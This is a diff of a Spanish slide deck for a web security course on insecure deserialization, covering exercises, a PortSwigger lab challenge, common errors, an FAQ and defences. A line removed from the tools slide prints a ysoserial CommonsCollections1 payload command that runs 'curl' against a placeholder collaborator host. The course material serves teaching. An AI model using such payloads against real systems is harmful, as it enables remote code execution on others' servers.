--- a/classes/parte-4-seguridad-de-aplicaciones-web/106-deserializacion-insegura/clase-106-presentacion.pptx
+++ b/classes/parte-4-seguridad-de-aplicaciones-web/106-deserializacion-insegura/clase-106-presentacion.pptx
@@ -17,6 +17,9 @@
     <p:sldId id="265" r:id="rId16"/>
     <p:sldId id="266" r:id="rId17"/>
     <p:sldId id="267" r:id="rId18"/>
+    <p:sldId id="268" r:id="rId19"/>
+    <p:sldId id="269" r:id="rId20"/>
+    <p:sldId id="270" r:id="rId21"/>
   </p:sldIdLst>
   <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -3198,7 +3201,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>⚠️ Errores comunes</a:t>
+              <a:t>✍️ Ejercicios</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3236,67 +3239,82 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  El objeto no se acepta — Longitud/formato mal recalculados; ajusta el serializado</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  ysoserial no funciona — Gadget no presente en el classpath; prueba otra chain</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Sin señal de RCE — Deserialización ciega; usa OOB</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Firma HMAC en el objeto — Está firmado; necesitas la clave (otro vector)</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Pickle sin efecto — El endpoint valida tipo; documenta la defensa</a:t>
+              <a:t>•  Decodifica y modifica un objeto PHP serializado para escalar privilegios.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Explica qué es una gadget chain y por qué depende de las librerías presentes.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Genera un payload con ysoserial y explica qué gadget usa.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Describe por qué pickle.loads sobre datos externos es peligroso.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Enumera magic methods relevantes en PHP, Java y Python.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Propón alternativas seguras (JSON con validación de esquema, firmas).</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3347,7 +3365,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>❓ Preguntas frecuentes</a:t>
+              <a:t>📝 Reto verificable</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3385,82 +3403,22 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  ❓ ¿Por qué es tan difícil de explotar?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Requiere conocer las librerías presentes para encadenar gadgets. La manipulación de estado, en cambio, es sencilla.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  ❓ ¿JSON es seguro?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  JSON no instancia objetos arbitrarios, así que evita el vector clásico, pero sigue necesitando validación de esquema y de tipos.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  ❓ ¿Cómo lo defiendo?</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  No deserialices datos no confiables. Si es inevitable, usa formatos de datos (no de objetos), firma e integridad, y allowlists de clases.</a:t>
+              <a:t>•  Resuelve un lab de deserialización de PortSwigger: primero uno de manipulación de atributos y, si llegas, uno de RCE con gadget chain.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Criterio de aceptación: al menos el lab de manipulación queda resuelto con evidencia del cambio de privilegio; documentas el formato serializado y por qué deserializar input no confiable es la causa…</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3511,7 +3469,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🔗 Referencias</a:t>
+              <a:t>⚠️ Errores comunes</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -3549,6 +3507,319 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
+              <a:t>•  El objeto no se acepta — Longitud/formato mal recalculados; ajusta el serializado</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ysoserial no funciona — Gadget no presente en el classpath; prueba otra chain</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Sin señal de RCE — Deserialización ciega; usa OOB</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Firma HMAC en el objeto — Está firmado; necesitas la clave (otro vector)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Pickle sin efecto — El endpoint valida tipo; documenta la defensa</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="320040"/>
+            <a:ext cx="8229600" cy="822960"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2600" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>❓ Preguntas frecuentes</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1280160"/>
+            <a:ext cx="8229600" cy="4937760"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿Por qué es tan difícil de explotar?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Requiere conocer las librerías presentes para encadenar gadgets. La manipulación de estado, en cambio, es sencilla.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿JSON es seguro?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  JSON no instancia objetos arbitrarios, así que evita el vector clásico, pero sigue necesitando validación de esquema y de tipos.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  ❓ ¿Cómo lo defiendo?</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  No deserialices datos no confiables. Si es inevitable, usa formatos de datos (no de objetos), firma e integridad, y allowlists de clases.</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide14.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="320040"/>
+            <a:ext cx="8229600" cy="822960"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2600" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>🔗 Referencias</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="TextBox 2"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="1280160"/>
+            <a:ext cx="8229600" cy="4937760"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
               <a:t>•  Stuttard &amp; Pinto, The Web Application Hacker's Handbook.</a:t>
             </a:r>
           </a:p>
@@ -3599,6 +3870,81 @@
           </a:p>
         </p:txBody>
       </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide15.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr/>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="TextBox 1"/>
+          <p:cNvSpPr txBox="1"/>
+          <p:nvPr/>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="274320"/>
+            <a:ext cx="8229600" cy="640080"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr wrap="square">
+            <a:spAutoFit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr sz="2200" b="1">
+                <a:solidFill>
+                  <a:srgbClr val="0B3D2E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Diagrama de la clase</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="3" name="Picture 2" descr="1efb05fa46368e5f.png"/>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="457200" y="3026664"/>
+            <a:ext cx="8229600" cy="1444752"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
   </p:cSld>
   <p:clrMapOvr>
@@ -3683,7 +4029,7 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Comprender y explotar la deserialización insegura: cuando una aplicación reconstruye objetos a partir de datos controlados por el atacante, permitiendo desde manipulación de estado hasta ejecución remota de código (RCE) mediante cadenas de gadgets. Es un fallo complejo pero de altísimo impacto.</a:t>
+              <a:t>•  Comprender y explotar la deserialización insegura: cuando una aplicación reconstruye objetos a partir de datos controlados por el atacante, permitiendo desde manipulación de estado hasta ejecución…</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4077,7 +4423,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>📖 Definiciones y características</a:t>
+              <a:t>🧠 Explicación en profundidad</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4115,82 +4461,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Serialización: convertir un objeto en bytes/texto para almacenarlo o transmitirlo. Característica: reversible mediante deserialización.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Deserialización insegura: reconstruir objetos desde datos del atacante. Característica: puede ejecutar código durante el proceso.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Gadget: clase presente en la app cuyo comportamiento se abusa en la deserialización. Característica: se encadenan para lograr RCE.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Gadget chain: secuencia de gadgets que culmina en una acción peligrosa. Característica: ysoserial las genera para Java.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Pickle: formato de serialización de Python. Característica: ejecuta reduce, peligroso con datos externos.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Magic methods: métodos que se invocan automáticamente (wakeup, readObject). Característica: puntos de entrada del ataque.</a:t>
+              <a:t>•  Serializar es convertir un objeto en memoria a una secuencia de bytes para guardarlo o</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  transmitirlo; deserializar es lo contrario, reconstruir el objeto a partir de esos bytes. Suena</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  inocuo, pero la deserialización insegura (A08 de OWASP) es de las vulnerabilidades más graves porque,</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  en muchos lenguajes, reconstruir un objeto ejecuta código —constructores, métodos especiales que</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  se invocan durante la reconstrucción—. Si la aplicación deserializa datos que vienen del usuario,</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  el atacante controla qué objetos se crean y, con ellos, qué código se ejecuta. La causa raíz es la</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  confianza: se asume que el flujo serializado es "de la aplicación", cuando en realidad puede venir de</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4241,7 +4602,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🧰 Herramientas y preparación</a:t>
+              <a:t>📖 Definiciones y características</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4279,52 +4640,82 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  PortSwigger labs de insecure deserialization.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  ysoserial (Java) y ysoserial.net (.NET).</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Burp para manipular los objetos serializados en cookies/parámetros.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  java -jar ysoserial.jar CommonsCollections1 'curl http://tu-collab' | base64</a:t>
+              <a:t>•  Serialización: convertir un objeto en bytes/texto para almacenarlo o transmitirlo. Característica: reversible mediante deserialización.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Deserialización insegura: reconstruir objetos desde datos del atacante. Característica: puede ejecutar código durante el proceso.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Gadget: clase presente en la app cuyo comportamiento se abusa en la deserialización. Característica: se encadenan para lograr RCE.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Gadget chain: secuencia de gadgets que culmina en una acción peligrosa. Característica: ysoserial las genera para Java.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Pickle: formato de serialización de Python. Característica: ejecuta reduce, peligroso con datos externos.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Magic methods: métodos que se invocan automáticamente (wakeup, readObject). Característica: puntos de entrada del ataque.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4375,7 +4766,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🧪 Laboratorio guiado</a:t>
+              <a:t>📔 Glosario</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4413,97 +4804,97 @@
